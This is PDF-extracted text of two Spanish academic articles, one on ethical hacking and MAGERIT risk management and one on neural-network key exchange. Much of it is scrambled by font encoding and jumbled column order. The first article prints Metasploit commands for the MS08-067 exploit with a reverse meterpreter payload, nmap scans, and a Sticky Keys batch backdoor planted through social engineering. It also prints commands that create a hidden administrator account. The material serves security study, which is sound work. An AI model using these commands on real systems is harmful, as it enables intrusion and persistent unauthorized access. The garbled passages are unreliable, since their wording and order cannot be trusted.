,SL[OPJHSOHJRPUNLZHJV[HKVLU[PLTWVYLÅLQHSH
situación real y debido a que es posible llegar o no
a los límites de lo que haría un atacante, este proceso solo respaldará la necesidad de llevar a cabo
el proceso de gestión de riesgos de la información.
Windows anteriormente, y puertos abiertos
PKLU[PÄJHKVZ WLYTP[L [VTHY JVU[YVS KL V[YV
SO, lo que se conoce como puertas traseras.
Usando los comandos:
>use exploit/windows/smb/ms08_067_netapi
>set RHOST ip_objetivo
>set payload windows/meterpreter/reverse_
tcp_allports
>set LHOST ip_propio
>set LPORT puerto_abierto
>exploit
se puede lograr acceder remotamente a otro PC o
servidor, en caso de no tener parches de seguridad
actualizados, caso contrario el acceso es denegado, y este es el caso del objetivo anteriormente escaneado.
Como no se accedió por puerta trasera, se prueban
otro tipo de accesos, considerando que el objetivo
es un SO Windows se comprobó que la conexión a
escritorio remoto esta activa (Figura 2), pero para el
acceso se necesita usuario y password.
Las herramientas mencionadas a diferencia de
otras son libres, de fácil manejo y automatizadas,
lo que facilita el proceso, minimiza el tiempo en el
que se lleven a cabo las pruebas y no requieren de
conocimientos expertos en diferentes SO o redes.
-
Metasploit, a través de exploits según la caYHJ[LYxZ[PJH KLS :6 X\L ZL PKLU[PÄJ} JVTV
R
A
I
Figura 7: Conexión a escritorio remoto activa by Microsoft Windows.
Mediante ingeniería social se logra que la víctima
del ataque ejecute el archivo batch:
Figura 6: Escaneo de conexiones de red con ZENMAP.
A
D
Para realizar el Ethical Hacking se consideran las
pruebas de penetración, con ayuda de algunas herramientas como Zenmap y Metasploit.
‹ ALUTHWWVYSHPU[LYMHJLNYmÄJHX\LWYVWVYJPVUH LZ MmJPS PKLU[PÄJHY JHYHJ[LYxZ[PJHZ KLS
SO y puertos abiertos del objetivo, es decir
a quien se atacará (Figura 1), para lo cual se
ejecuta el comando “nmap –T4 –A –v ip_objetivo” y “nmap -p 1-65535 -T4 -A –v ip_objetivo”.
P
echo off
title .
*VW` ¸J!C^PUKV^ZCZ`Z[LTCZL[OJL_L¹ ¸J!C
^PUKV^ZCZ`Z[LTCZL[OJaaa¹
*VW` ¸J!C^PUKV^ZCZ`Z[LTCJTKL_L¹ ¸J!C
^PUKV^ZCZ`Z[LTCZL[OJL_L¹
del %0
exit
Con la ejecución de este código se activa el símbolo del sistema en lugar de la opción Stick Key
de Windows, con lo que se ha creado una puerta
G
M
A
63
P
trasera al SO desde la conexión al escritorio remoto
activado donde se ejecutan las siguientes líneas de
comando:
>net user xx xx /add
>net localgroup Administradores xx /add
A
R
A
D
I
G
M
A
64
Al crear un usuario con privilegios de administrador
en el SO del objetivo se puede acceder al mismo y
tener acceso a la información almacenada allí, y es
WVZPISLYLHSPaHYTVKPÄJHJPVULZWHYHKLULNHJP}UKL
HJJLZVTVKPÄJHJP}UVLSPTPUHJP}UKLPUMVYTHJP}U
con lo que se evidenciaron vulnerabilidades.
Proceso de gestión de riesgos.
La versión 3.0 de MAGERIT considera que el análisis de riesgos permite determinar cómo es, cuánto
vale y cómo de protegido se encuentra un sistema. En coordinación con los objetivos, estrategia y
política de la Organización, las actividades de tratamiento de los riesgos permiten elaborar un plan
de seguridad que, implantado y operado, satisfaga
los objetivos propuestos con el nivel de riesgo que
acepta la Dirección. Al conjunto de estas actividades se le denomina Proceso de Gestión de Riesgos.
Considerando que las organizaciones requieren
demostrar que realizan una gestión competente y
efectiva de la seguridad de los recursos y datos
que gestionan debido a las auditorías tanto internas
como externas a las que son sometidas, es necesario realizar un análisis de riesgos, al ser éste el paso
previo que da lugar a una auditoria y por lo cual
se considera la existencia de normas que se deben
tomar en consideración.
Para la elección de la metodología del proceso de
gestión de riesgos se toma en cuenta diversos estudios como el de Padilla P. Cristina realizado el
2012 y titulado “Análisis y Gestión de Riesgos Informáticos para la protección de los Sistemas de
Información en el Área de Tecnologías Informáticas del Gobierno Provincial de Tungurahua”, donde concluye luego de haber realizado un análisis
comparativo de diversas metodologías, seleccionar
MAGERIT, por las siguientes razones:
‹ 4(.,90; [YHIHQH JVU PUMVYTHJP}U KPNP[HS `
sistemas informáticos para ser analizados.
‹ 7LYTP[LZHJHYPUMVYTHJP}UVSVZZLY]PJPVZKLS
sistema, los cuales son valiosos para MAGERIT ya que permite saber el grado de riesgo que se encuentra cada activo y así poder
protegerlo.
‹ 6MYLJL\UTt[VKVZPZ[LTH[PaHKVWHYHHUHSPzar los riesgos.
‹ (`\KH H PKLU[PÄJHY ` WSHUPÄJHY TLKPKHZ ULcesarias para reducir los riesgos.
‹ )YPUKHOLYYHTPLU[HZX\LH`\KHUHMHJPSP[HYLS
análisis de Riesgos.
Por otra parte el estudio de Rubio R. Sandra realizado el año 2005 y titulado “Desarrollo de una herramienta de gestión de riesgos de proyectos software”, concluye:
‹ 3HTL[VKVSVNxHKLHUmSPZPZ`NLZ[P}UKLYPLZgos MAGERIT, ayuda a enfocar el problema
de la seguridad desde una perspectiva completa, y que evoluciona en el tiempo.
‹ 4(.,90;J\LU[HJVUOLYYHTPLU[HZX\LYLHSPzan gestión de riesgos siguiendo la metodología.
‹ ,Z WVZPISL HWSPJHY SH 4L[VKVSVNxH 4(.,90;
en proyectos de Software ya que es una
metodología completa con la que se puede
crear o desarrollar Software
Matalobos V. Juan Manuel desarrolla un estudio el
año 2009 cuyo título es “Análisis de riesgos de seguridad de la información” donde realiza un análisis
comparativo entre diversas metodologías de análisis de riesgos entre las que se encuentran la ISO
27005:2008, UNE 71504:2008, BS 7799-3:2006,
AS/NZS 4360:2004, OCTAVE, CRMM, NIST SP
800-30, IRAM, CORAS, SOMAP, FAIR y MAGERIT.
Como resultado del análisis se obtienen las siguientes conclusiones respecto a MAGERIT:
‹ ,SHSJHUJLKLSHTL[VKVSVNxHSSLNHHSHUmSPZPZ
y gestión de riesgos.
‹ ,S [PWV KL HUmSPZPZ LZ JVTWSL[V ` W\LKL ZLY
cuantitativo o cualitativo, pero no mixto
‹ ,S[PWVKLYPLZNVX\LJVUZPKLYHLZPU[YxUZLJV
y efectivo, pero no residual
‹ 3VZLSLTLU[VZKLSTVKLSVX\L[VTHLUJ\LUta corresponden a los activos, las dependencias, las amenazas y las salvaguardas; por
el contrario no considera los procesos, los
recursos y las vulnerabilidades.
‹ 3VZVIQL[P]VZKLZLN\YPKHKX\LWLYZPN\LZVU
SVZ KL JVUÄKLUJPHSPKHK PU[LNYPKHK KPZWVUPbilidad, autenticidad y trazabilidad.
‹ *VUZPKLYHPU]LU[HYPVZKL[PWVZKLYLJ\YZVZ`
HTLUHaHZ WLYV ZVSV KLÄUL \UH [H_VUVTxH
de salvaguardas.
‹ 9LZWLJ[VHSHZH`\KHZX\LVMYLJLWHYHSHPTWSHU[HJP}UKLÄULLSWSHUKLWYV`LJ[VZIYPUda técnicas y roles para llevarlos a cabo por
ser una herramienta comercial.
Tomando en cuenta los estudios previamente mencionados para el desarrollo del proceso de gestión
de riesgos se toma opta por la elección de la metodología MAGERIT además que sigue parámetros
de la ISO 31000, considera análisis cuantitativo o
cualitativo, actualmente se encuentra en su tercera
versión por lo que se ha perfeccionado y para evitar malinterpretaciones describe detalladamente su
desarrollo y sugiere herramientas para el mismo en
tres libros (Figura 3).
conforme plantea MAGERIT, y se muestra a continuación:
AMENAZAS
Símbolo
Criterio
[N]
Desastres Naturales
[I]
De Origen Industrial
[E]
Errores y Fallos No Intencionados
[AI]
Ataques Intencionados
Posteriormente se reconocieron 41 salvaguardas
empleadas en las mismas 11 áreas, a partir de las
cuales y tomando en cuenta la valoración previa de
activos, amenazas, salvaguardas y las fórmulas de:
‹ KL[LYTPUHJP}UKLS5P]LSKL0TWHJ[V$%0Tpacto=Valor*Degradación
‹ KL[LYTPUHJP}UKLS,Z[HKVKL9PLZNV$%9PLZgo=Impacto*Frecuencia
:LPKLU[PÄJHYVUYPLZNVZ
Figura 3: Organización de los libros de MAGERIT
–versión 3.0.
La metodología propone la realización tanto del
análisis de los riesgos y como la gestión de riesgos que se realizan a partir de diferentes acciones
(Figura 4).
Seguidamente se realizó la evaluación de los niveles de riesgo que una violación de la seguridad tiene y pueden ser Muy Alto, Alto, Medio, Bajo y Muy
Bajo (Figura 5), con un grado de riesgo estimado en
61.71%; se señalan las amenazas que se consideran riesgos inaceptables (Figura 6), es decir, las que
presentan niveles de riesgos Muy Alto, Alto y Medio
para consecutivamente en común acuerdo con la
organización determinar su tratamiento.
P
A
R
A
D
I
G
Figura 4: Organización del proceso de gestión de riesgos según MAGERIT –versión 3.0.
Figura 5: Porcentaje de riesgos estimados como
resultado del análisis de riesgos en base a MAGERIT–versión 3.0.
La realización de un análisis de los riesgos implica
PKLU[PÄJHJP}U ` ]HSVYHJP}U KL HJ[P]VZ HTLUHaHZ `
salvaguardas mediante el uso de checklist, y entrevistas para poder calcular el impacto y riesgo residual.
*VTV YLZ\S[HKV KL LZ[H L[HWH ZL PKLU[PÄJHYVU tipos de activos, en 11 áreas diferentes y dentro
SHZ TPZTHZ ZL PKLU[PÄJHYVU ` ]HSVYHYVU KPZ[PU[HZ
HTLUHaHZJSHZPÄJHKHZZLN‚UZ\VYPNLULUmYLHZ
M
A
Figura 6: Zona de riesgos establecida según MAGERIT – version 3.0.
65
P
A
R
Siguiendo la metodología se procede a la evaluación de riesgos y como resultado se obtuvieron 235
riesgos a tratar entre niveles Medio, Alto y Muy Alto
(M/A/MA), los cuales se agruparon según el tipo de
amenazas, obteniendo 33 amenazas que requieren
ser tratadas con una probabilidad de ocurrencia de
riesgo de 70.41%.
Para elaborar el plan de seguridad que es el producto de la etapa de tratamiento se consideran
28 amenazas que se someten a mitigación, 4 se
JVTWHY[LU ` ZL [YH[H WVY ÄUHUJPHJP}U +PJOV
plan de seguridad se organiza en 3 tareas considerando salvaguardas, responsabilidades, tiempo
de ejecución y estado de riesgo (Figura 7), este
plan se entrega directamente a la organización
sobre la cual se aplica el proceso de gestión de
riesgos.
‹ :LM\UKHTLU[HLUSHZPTWSPJPKHKKLSJ}KPNV`
retroalimentación
Tomando en cuenta que el software propuesto servirá de apoyo al proceso y no será la herramienta
principal para llevar a cabo el proceso de gestión
de riesgos, el tiempo para el desarrollo de dicho
software es limitado.
;YHZKLZHYYVSSHYSHZL[HWHZKLWSHUPÄJHJP}UKPZL|V
JVKPÄJHJP}U`WY\LIHZZLN‚USHTL[VKVSVNxH?7ZL
obtuvo un sistema funcional (Figura 8) capaz de coadyuvar al proceso de gestión de riesgos, según se
planteó anteriormente.
A
D
Figura 7: Organización del plan de seguridad según MAGERIT –versión 3.0.
I
G
M
A
66
El proceso de gestión de riesgos debe ser monitorizado permanentemente según indica la etapa
KLZLN\PTPLU[V`YL]PZP}UX\LLZWLJPÄJH4(.,90;
para lo cual se plantea la realización de un sistema
informático.
(a) (b)
Figura 8: Sistema propuesto para coadyuvar al
proceso de gestion de riesgos.
Ingeniería de software.
Mediante la aplicación de Ethical Hacking se evidencian vulnerabilidades en un sistema, pero no
W\LKLU JVUZPKLYHYZL JVTV \UH JLY[PÄJHJP}U KL
que un sistema es seguro o inviolable, pero da lugar
a la realización del proceso de gestión de riesgos.
Pressman, R. S. (2005) expresa que la Ingeniería
de Software comprende métodos, herramientas y
procedimientos orientados a la construcción de un
ZVM[^HYL LÄJPLU[L X\L ZH[PZMHNH SHZ ULJLZPKHKLZ
requeridas.
Considerando lo anteriormente citado se debe tomar en cuenta que existen diversas metodologías
para el desarrollo de software, entre tradicionales
y ágiles, en este estudio se considera la programación extrema (XP) por ser:
‹ <UH TL[VKVSVNxH KL KLZHYYVSSV YmWPKV X\L
consta de solo 4 fases
‹ 5VZLJLU[YHLUSHKVJ\TLU[HJP}UKLSZPZ[Lma, su desarrollo es iterativo e incremental
‹ :LPU[LNYHHSJSPLU[LJVTVWHY[LKLSLX\PWV
Conclusiones.
El análisis de riesgos permite conocer de manera
KL[HSSHKH J}TV M\UJPVUHU SVZ ZPZ[LTHZ L PKLU[PÄcar activos, amenazas, salvaguardas, niveles de
impacto y riesgo del sistema de información para
su posterior evaluación.
Por otro lado la gestión de riesgos también establece la situación de la organización, donde se realiza
este tipo de estudios, respecto a la seguridad de
la información recomendando las medidas apropiadas que deberían adoptarse para controlar riesgos
PKLU[PÄJHKVZ`KV[HYKLZLN\YPKHKH\UZPZ[LTHKL
información. Se tiene en cuenta todos los elemen-
tos que lo componen, se analiza el nivel de vulnerabilidad de cada uno de ellos ante determinadas
amenazas y se valora el impacto que un ataque
causaría sobre todo el sistema, apoyando a la organización en el proceso de evaluación o auditoria
debido a la minimización del impacto en casos de
incidentes.
nómicas que pueden suscitarse, provocando una
variación en cuanto al nivel de seguridad (Figura 9)
A
El sistema que se propone para realizar la parte
de seguimiento del proceso de gestión de riesgo,
coadyuva a mantener los niveles de riesgos controlados y ayuda a la implantación del plan de seguridad.
Aportes y Resultados
La aplicación de Ethical Hacking permite demostrar
la existencia de vulnerabilidades y así se evidencia
la fragilidad de la seguridad de la información.
Por otra parte habiendo comprobado la fragilidad
de la seguridad se da lugar a la aplicación del proceso de gestión de riesgos permitiendo establecer
un plan de seguridad que reconoce a los responsables de cada actividad establecida ahí, y los tiempos que tomara su implementación. Todo esto para
poder elevar el nivel de seguridad de la información
YLZN\HYKmUKVSH`IYPUKmUKVSLTH`VYJVUÄHIPSPKHK
El desarrollo del proceso de gestión de riesgos es
oportuno, pues se ha dado importancia a lo que
realmente debería tomar en cuenta para mantener
un entorno seguro anticipando las pérdidas eco-
P
Figura 9: Variación en niveles de seguridad considerando las 5 dimensiones según MAGERIT –versión 3.0.
Además se generó un sistema que permite realizar
el seguimiento de los niveles de riesgos que presentó el sistema de información, previo desarrollo
del proceso de gestión de riesgos.
R
A
9LMLYLUJPHZ)PISPVNYmÄJHZ
‹ (.<03,9( 7<90-0*(*0Ô5 Seguridad
Informática. Pozuelo de Alarcón, España: Editorial Editex.
‹ (9,0;06)1(=0,9 Seguridad de la inforTHJP}U! YLKLZ PUMVYTm[PJH ` ZPZ[LTHZ KL PUMVYmación. Madrid: España. Consultado el: (14 de
(IYPS=PZ[HWYL]PH!O[[W!$LZZH$?LP$
D
I
G
M
A
Competencia Nacional de Programación
en Santa Cruz
67
MODELO DE INTERCAMBIO
DE CLAVES CRIPTOGRÁFICAS
APLICANDO REDES
NEURONALES ARTIFICIALES
P
A
R
A
D
I
G
M
A
68
Bernardo Vargas Rivera
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
[email protected]
La Paz-Bolivia
RESUMEN
El presente artículo expone el desarrollo de un moKLSV KL PU[LYJHTIPV KL JSH]LZ JYPW[VNYmÄJHZ \[PSPaHUKVYLKLZUL\YVUHSLZHY[PÄJPHSLZ,STVKLSVWYLsentado se encuadra dentro de lo que se conoce
comúnmente como Criptografía basada en Redes
Neuronales o Criptografía Neuronal. El objetivo
de este modelo es demostrar la factibilidad de un
sistema de intercambio de claves sobre un canal
público por medio de redes neuronales que luego
podría ser utilizado por algún método de cifrado simétrico a elección.
INTRODUCCIÓN
Los tres conceptos básicos de criptografía incluyen
el protocolo de intercambio de clave, criptografía
de clave pública y criptografía de clave privada. El
protocolo se encarga de la transmisión de información entre las redes de ambas partes hasta encontrar una clave secreta y compartida en común. Esta
clave es luego utilizada en el cifrado/descifrado de
la información transmitida.
El concepto básico de un protocolo de intercambio de clave basado en redes neuronales se basa
primordialmente en dos atributos clave de redes
neuronales. El primero, es que dos redes neuronales conectadas sobre un canal público se sincronizarán a pesar de cada una presente muestre un
comportamiento caótico. El segundo que una red
externa, aunque sea idéntica a ambas partes, se
LUMYLU[HYm H NYHUKLZ KPÄJ\S[HKLZ WHYH ZPUJYVUPaHY
con las mismas a pesar de que se comunican sobre
un canal público. (Diaz, 2012)
Es por eso que se desarrolla el modelo de interJHTIPV KL JSH]LZ JYPW[VNYmÄJHZ HWSPJHUKV YLKLZ
UL\YVUHSLZ HY[PÄJPHSLZ LU LZWLJxÄJV SHZ TmX\PUHZ
KLmYIVSKLWHYPKHKJVULSÄUKLYLK\JPYSH]\SULrabilidad de los ataques del interceptor que consiguen información que no le pertenece.
Para ello se debe generar un algoritmo que muestre las actividades que se desarrollan en cada red
neuronal para obtener los mismo pesos en ambas
redes neuronales.
PROBLEMÁTICA
En la actualidad la información es vital para muchas
LTWYLZHZ X\L THULQHU KH[VZ JVUÄKLUJPHSLZ KL
sus clientes y que no debe ser revelada al público.
Si ésta es revelada traería muchas consecuencias
negativas que reduciría el prestigio de las empresas. En la mayoría de las empresas se envía inforTHJP}UJVUÄKLUJPHSHZ\ZJSPLU[LZH[YH]tZKLS0Uternet, la cual está expuesta a cualquier interceptor
que desee conseguir la información de los clientes
de forma ilegal.
Evitando este ataque, con la intención de conseguir
SHPUMVYTHJP}UJVUÄKLUJPHS`HJJLKLYHSZPZ[LTHZL
necesita que la información viaje cifrada mediante
algoritmos de criptografía de una manera segura
por el canal de comunicación. Otro problema es la
HKTPUPZ[YHJP}U KL SHZ JSH]LZ JYPW[VNYmÄJHZ KL SVZ
distintos usuarios, con las cuales se cifra y descifra
la información. Es por eso que se usa el método
NLULYHJP}U L PU[LYJHTIPV KL JSH]LZ JYPW[VNYmÄJHZ
basado en redes neuronales, para que se generen
una clave distinta cada vez que se conecte cualquier usuario.
REDES NEURONALES
Como técnica se utiliza un tipo especial de red neuronal denominada la máquina de árbol de paridad,
la cual es una red neuronal multicapa y de alimentación hacia adelante.
Una máquina de árbol de paridad consta de varios
perceptrones, los cuales tienen varias neuronas de
entrada y una única salida, es decir una neurona en la
capa de salida. Estos perceptrones se conectan a una
misma neurona de salida para mostrar el resultado.
Figura 2: Máquina de Árbol de Paridad
Esta red neuronal consta de una neurona de salida
T, K neuronas ocultas y K * N neuronas de entrada.
Las neuronas de entrada toman valores binarios:
Los pesos entre las neuronas de entrada y de la
capa oculta tomar los valores que se encuentran en
el siguiente rango:
El valor de salida de cada neurona de la capa oculta
se calcula como la sumatoria de todas las multiplicaciones de las neuronas de entrada y los pesos,
que tienen la siguiente formula:
Signo (Signum) es una simple función, que devuelve tres valores de la siguiente manera:
La salida de red neuronal se calcula como la multiplicación de todos los valores producidos de las
neuronas de la capa oculta, con la siguiente formula:
‹ Paso 1: Determinación de los parámetros de
las redes neuronales: K, el número de neuronas en la capa oculta; N, la cantidad de neuronas en la capa de entrada; L, el rango de
los valores que tomaran los pesos de ambas
redes neuronales. Esto se realiza para que
ambas redes neuronales tengan la misma
estructura.
‹ Paso 2: Los pesos de las redes neuronales
se inician aleatoriamente.
‹ Paso 3: El arreglo de entradas es generada
aleatoriamente con valores
‹ Paso 4: Calcular los valores de las neuronas
ocultas
‹ Paso 5: Calcular los valores de la neurona de
salida
‹ Paso 6: Comparar la salida de ambas redes
neuronales. Si las salidas no son iguales, se
pregunta si los pesos son iguales, si estos no
los son entonces se regresa al paso 3. Caso
contrario, si las salidas son iguales, se actualizan los pesos de las redes neuronales con
alguna regla de aprendizaje: aprendizaje Hebbiano, aprendizaje Anti-Hebbiano o aprendizaje de Paso aleatorio.
‹ Paso 7: Repetir el proceso hasta que los pesos de ambas redes neuronales sean iguales. Seguidamente se tendrá la clave criptoNYmÄJH X\L LZ LS ]HSVY KL SVZ WLZVZ KL SHZ
redes neuronales.
‹ Paso 8: Se sigue ejecutando el programa,
para que el interceptor no se dé cuenta cuanKVZLVI[PLULSHJSH]LJYPW[VNYmÄJH
Una vez que se determinen los parámetros, se tienen las arquitecturas de las redes neuronales. Seguidamente continúa el proceso de sincronización
dentro de una red neuronal que se muestra en la
ÄN\YH
P
A
R
A
D
I
G
HERRAMIENTAS
La salida puede tomar dos valores: 1 y -1. Cada red
neuronal obtiene su salida. Una vez obtenida, esta
es comparada con la salida generada de la otra red
neuronal. Cuando las redes neuronales obtienen
SHTPZTHZHSPKHZLWYVZPN\LHTVKPÄJHYSVZWLZVZ
con la regla de aprendizaje.
ALGORITMO DE INTERCAMBIO DE CLAVE
CRIPTOGRÁFICA
3VZWHZVZHZLN\PYWHYHNLULYHYSHJSH]LJYPW[VNYmÄca son los que se muestren a continuación:
La aplicación se desarrolla con el software Visual
Studio con el código C. Esto se debe a que las cla]LZJYPW[VNYmÄJHZZLPU[LYJHTIPHULU[YLSVZ\Z\Hrios y el servidor, que se encuentran conectados
mediante el protocolo TCP/IP.
M
Además de que cumple con las condiciones de
un modelo cliente servidor. El cliente es el usuario
que manda la información que genera la red neuronal al servidor que se encuentra en la empresa
JVU SH J\HS ZL PU[LYJHTIPHYm PUMVYTHJP}U JVUÄdencial.
A
69
P
A partir del análisis de las características, se determinará las variables que ingresaran al modelo para
que la red neuronal pueda aprender. Seguidamente
ZL[PLULX\LPKLU[PÄJHYSVZJHZVZKL\ZVKLSZPZ[LTH
mostrando los actores involucrados. Mediante estos diagramas se puede describir el comportamiento del modelo a partir de la acciones de un usuario.
Posteriormente se realizará el diagrama de robus[LaWHYHWVKLYPS\Z[YHYNYmÄJHTLU[LSHZPU[LYHJJPVnes entre los objetos participantes de un caso de
uso. El análisis de robustez ayuda a saber si las esWLJPÄJHJPVULZKLSZPZ[LTHZVUYHaVUHISLZ
A
R
Para ello se deben aplicar las siguientes reglas básicas:
‹ (J[VYLZZVSVW\LKLUJVT\UPJHYZLJVUVIQLtos interfaz.
‹ 3HZPU[LYMHJLZZVSVW\LKLUJVT\UPJHYZLJVU
controles y actores.
‹ 3VZVIQL[VZLU[PKHKZVSVW\LKLUJVT\UPJHYse con controles.
‹ 3VZ JVU[YVSLZ ZL JVT\UPJHU JVU PU[LYMHJLZ
objetos identidad y con otros controles pero
nunca con actores.
A
D
Diseño
I
Figura 3: Proceso de Sincronización de una Red
Neuronal.
G
M
A
70
METODOLOGÍA
A continuación se presenta la metodología del presente trabajo de grado que consta de cuatro fases:
Diagnóstico, Diseño, Implementación, Validación.
Diagnóstico
,Z[HMHZLLTWPLaHJVUSHPKLU[PÄJHJP}UPUMVYTHSKL
todos los requisitos que deberían ser parte del sistema, para ello se empieza con la recolección de
datos mediante la observación y principalmente
utilizando la elaboración de entrevista y cuestionario. Seguidamente se podrá realizar un diagrama de clases de alto nivel que muestre los obje[VZ`[VKHZZ\ZYLSHJPVULZKLÄUPKVJVTVTVKLSV
de dominio. Seguidamente se realiza un prototipo rápido que muestre las interfaces del sistema
para que se evalúe con los usuarios y así estén de
acuerdo en que el modelo contenga las características necesarias.
Después de haber analizado los requerimientos
que debe presentar el modelo se pasa a la fase de
KPZL|VLUSHJ\HSZLKLILLZWLJPÄJHYLSJVTWVYtamiento del modelo con la elaboración de diagramas de secuencia. Con ello se conseguirá las interacciones entre objetos desde un punto de vista
temporal y se podrá ver que métodos llevaran las
clases del modelo. Los diagramas de secuencia se
componen de cuatro elementos que son: el curso
de acción, los objetos, los mensajes y los métodos
(operaciones).
Con respecto a la red neuronal se tendrá que determinar cuántas entradas y salidas tendrá la misma
dependiendo de las entradas que se tengan. Además se tendrá que conocer el número de neuronas
y como estas están distribuidas en capas e interconectadas entre sí. En esta fase también se determinará las funciones de transferencia que se usarán.
Esta fase termina cuando se adicionan los detalles
del diseño en el diagrama de clases para que satisMHNH[VKVZSVZYLX\PZP[VZPKLU[PÄJHKVZ
Implementación
+LZW\tZKL]LYPÄJHYX\LLSKPZL|VZH[PZMHJL[VKVZ
SVZYLX\PZP[VZPKLU[PÄJHKVZZLWYVZPN\LJVUSHMHZL
de implementación. En ésta se utiliza el diagrama
de componentes, si fuera necesario para apoyar el
desarrollo. Seguidamente se generará el código del
programa en el lenguaje de programación escogido.
40
3
15
87 64 e8 d7 e7 13 4b 53
ee 77 d0 df 9e 77 ea 41
8d 84 67 dc ed ae e1 8f 7f
2 43 65 2 11 33 9c
Una vez diseñada la arquitectura de la red neuronal
y que el código esté terminado, se tiene que entrenar a la red para que aprenda el comportamiento
X\LKLIL[LULYJVULSÄUKLX\LWYVWVYJPVULSHYLZW\LZ[HHKLJ\HKHHSHJVUÄN\YHJP}UKLSVZWH[YVULZ
de entrada.
10
20
5
35 46 66 f 9e 8c f7 4e 6a
67 74 49 de 69 41 28 1d
f3 40 99 bb 8f b8 92 3a a
d3 37 2b 7 9d 98
50
5
3
62 be ac 6f 18 ce eb 3c c3
b4 bd 7d de 3c a4 55 dd
f6 1 6c 2d 86 63 ff d2 fe
10 93 b7 55 c4 d2
Validación
Finalmente se tienen que realizar la aceptación de
los resultados mediante las distintas pruebas escogidas, que son las siguientes: prueba de unidad,
prueba de tiempo de desarrollo, prueba de integración, prueba de sistema y la prueba de aceptación.
Después de que la red aprenda los ejemplos en el
juego de ensayo, deberá ser capaz de responder
de una manera correcta cuando se le presentes
nuevas entradas. En el juego de ensayo no se podrá incluir una gran colección de hechos. Es por
eso que se requiere seleccionar hechos que representen claramente cada uno de los patrones a reconocer y las situaciones extremas de evaluación.
Se concluirá esta fase con realización de la prueba
de hipótesis que determinará si la hipótesis es una
HÄYTHJP}UYHaVUHISL
Tabla 1: Ingreso de Parámetros Distintos y la GeULYHJP}UKL*SH]L*YPW[VNYmÄJH
Parámetros (Entradas)
Después de realizar la validación del moledo neuronal se obtuvieron los resultados esperados, las
claves generadas de acuerdo a los pesos igualados
de las redes neuronales.
Primeramente se muestra en la tabla 1 la generaJP}UKLJSH]LZJYPW[VNYHÄJHZJVUKPZ[PU[VZWHYmTLtros de las redes neuronales y después en la tabla 2
se puede observar las claves generadas mediante
redes neuronales con los mismos parámetros.
Parámetros (Entradas)
Salidas
Neuronas Neuronas
Entrantes Ocultas
Rango de
Pesos
10
5
3
1c 17 9 94 a6 fe 2f 71 c2
93 ab d3 65 a8 d8 7f df
f7 88 c9 95 51 a ab 96 fb
4a a
10
3
5
19 a8 9b de 50 36 64 8b
7e 5f 8c 2a 42 89 89 dc
5d b9 ad 86 da 16 66 7e
f5 ed 53 d7 20 ed db 2d
*SH]L*YPW[VNYmÄJH
A
R
Salidas
Neuro-nas Neuronas
Entrantes Ocultas
Rango de
Pesos
20
5
10
ca e9 82 8c a6 ee 2a 8e
4c 86 da bb a6 40 a2 99
75 f0 54 c7 b0 a bb c2 3d
2f 3d 69 9f 80 51 cb
20
5
10
95 67 3b 47 10 b8 f4 be
9a 55 c8 ec bc b3 fb 3d
a1 96 43 5c 8f b6 95 51
d1 12 12 29 ea cf e8 f
20
5
10
62 46 48 f5 9b 67 38 c8
62 68 b0 28 d ac 82 2b
23 48 b8 ab c6 d3 20 5
49 37 51 9 b 27 63 c4 7e
20
5
10
6f c2 e3 d4 61 a2 3e b7 2
bc 32 cf ff f0 37 23 98 6
72 c4 d8 bb 4c e6 f1 b1
57 8 c c 50 9f 37
20
5
10
fc e5 6 cb 3c bd 67 89 21
a7 f1 73 23 a5 13 75 c0
2e 7f da 55 1 c0 62 28 27
54 5 1 21 4f a4 e9
RESULTADOS
P
*SH]L*YPW[VNYmÄJH
Tabla 2: Ingreso de Parámetros Iguales y la GeneYHJP}UKL*SH]L*YPW[VNYmÄJH
COMPROBACIÓN DE LA HIPOTESIS
Hipótesis: “El modelo de intercambio de claves
JYPW[VNYmÄJHZIHZHKVLUYLKLZUL\YVUHSLZHY[PÄJPHles permite incrementar la velocidad de intercambio
de claves de manera segura, contribuyendo a disminuir la vulnerabilidad a los ataques del interceptor que violan la seguridad de información”
A
D
I
G
M
A
71
P
A
R
Prueba de Hipótesis
CONCLUSION
Una métrica para probar la hipótesis es el tiempo
LU LS J\HS ZL PU[LYJHTIPHU SHZ JSH]LZ JYPW[VNYmÄcas. En este caso se comparará los algoritmos DiMÄL/LSSTHU`9:(X\LZPY]LWHYHPU[LYJHTIPHYJSHves, con el algoritmo propuesto basado en redes
neuronales.
7HYHLSPU[LYJHTIPVKLJSH]LZJYPW[VNYmÄJHZLU[YL
dos partes existe el protocolo mas utilizado que es
LS+PMÄL/LSSTHU,Z[LHSNVYP[TVLZZLN\YVWVYSH
complejidad de su funcionamineto. Sin embargo
presenta una serie de debilidades:
Seguidamente se realizó 50 corridas para cada uno
KLLZ[VZTt[VKVZJVULSÄUKLVI[LULYSVZ[PLTWVZ
de generación e intercambio de la clave criptográÄJH=LY;HISH
Tiempo de ejecución de Intercambio de la Clave Crip[VNYmÄJHZLN\UKVZ
Ejecución
A
*YPW[VNYHÄH
Algoritmo
Neuronal
+PMÄL/LSSTHU
Algoritmo
RSA
Sumatoria
7,606
24,295
12,099
Media
0,15212
0,4859
0,24198
Tabla 3: Tiempo de Ejecución de Intercambio de
*SH]L*YPW[VNYmÄJH
D
I
G
M
A
72
*VTWHYHJP}ULU[YLTVKLSVWYVW\LZ[V`+PMÄL/Lllmann
H0: La media del tiempo de intercambio de claves
perteneciente al modelo de redes neuronales es
igual a la media del tiempo de intercambio de cla]LZWLY[LULJPLU[LHSHSNVYP[TV+PMÄL/LSSTHUU
H1: La media del tiempo de intercambio de claves
perteneciente al modelo de redes neuronales es
menor a la media del tiempo de intercambio de cla]LZWLY[LULJPLU[LHSHSNVYP[TV+PMÄL/LSSTHUU
Luego se calcula el valor de Z:
Después de realizar el cálculo de Z, se comprueba
si se encuentra dentro de la región crítica.
Se debe rechazar la hipótesis nula H0, porque el
valor Z obtenido pertenece a la región crítica. Entonces, se acepta la hipótesis H1.
‹ ,Z[HL_W\LZ[VHSH[HX\LKL0U[LYJLWJP}ULU
el que algun interceptor puede suplantar la
identidad de la parte B mientras se comunica
JVUSHWHY[L(JVULSÄUKLYL[YHUZTP[PYTLUsajes de A a B y biseversa
‹ 6[YV WYVISLTH LZ X\L YLX\PLYL \U LSL]HKV
número de cálculos, como ser: factorización
de primos o el uso de logaritmo discreto.
Existe otro metodo que es el uso de maquinas de
árbol de paridad, las cuales deben ser sincronizadas para obtener los mismos pesos, con los cuales
ZL NLULYHU SHZ JSH]LZ JYPW[VNYmÄJHZ TLKPHU[L SH
